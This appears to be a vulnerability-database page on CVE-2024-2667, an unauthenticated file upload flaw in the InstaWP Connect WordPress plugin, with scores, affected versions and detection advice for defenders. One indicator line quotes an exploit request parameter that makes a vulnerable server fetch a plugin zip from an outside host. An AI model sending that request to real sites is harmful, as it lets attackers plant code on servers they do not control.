cbcvebase.
CVE-2024-2667
published 2024-05-02

CVE-2024-2667: The InstaWP Connect – 1-click WP Staging & Migration plugin for WordPress is vulnerable to arbitrary file uploads due to insufficient file validation in the…

PriorityP185critical9.8CVSS 3.1
AVNACLPRNUINSUCHIHAH
ITWEXPLOITVulnCheck KEVInitial access
Exploited in the wild
EPSS
5.75%
92.1th percentile
The InstaWP Connect – 1-click WP Staging & Migration plugin for WordPress is vulnerable to arbitrary file uploads due to insufficient file validation in the /wp-json/instawp-connect/v1/config REST API endpoint in all versions up to, and including, 0.1.0.22. This makes it possible for unauthenticated attackers to upload arbitrary files.

Affected

2 ranges
VendorProductVersion rangeFixed in
instawpinstawp_connect< 0.1.0.230.1.0.23
instawpinstawp_connect_1-click_wp_staging_migration<= 0.1.0.22

Detection & IOCsextracted from sources · hover to see the quote

url/wp-json/instawp-connect/v1/config
url/?rest_route=/instawp-connect/v1/config
path/wp-content/plugins/instawp-connect/
commandapi_key={{randstr}}&override_plugin_zip=http://{{interactsh-url}}
  • Detect exploitation attempts by monitoring POST requests to the REST API endpoint /?rest_route=/instawp-connect/v1/config or /wp-json/instawp-connect/v1/config with the 'override_plugin_zip' parameter pointing to an external URL.
  • A successful exploitation response returns HTTP 200 with a JSON body containing both '"status":true' and '"message":' fields and Content-Type of application/json.
  • Identify vulnerable WordPress installations by searching for the presence of the InstaWP Connect plugin path in the page body.
  • The attack is unauthenticated — no session or authentication token is required. Any POST to the config endpoint with override_plugin_zip should be treated as suspicious.
  • ·The vulnerability affects all versions up to and including 0.1.0.22. Version 0.1.0.23 and later are patched. Ensure detection rules are scoped to installations running vulnerable versions.
  • ·The Nuclei template uses an out-of-band interaction (interactsh) to confirm the server fetches the supplied override_plugin_zip URL, meaning passive network monitoring for outbound HTTP requests from the WordPress server triggered by this endpoint can also serve as a detection signal.

CVSS provenance

nvdv3.19.8CRITICALCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
vulncheck9.8CRITICAL
vendor_redhat5.3MEDIUM
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.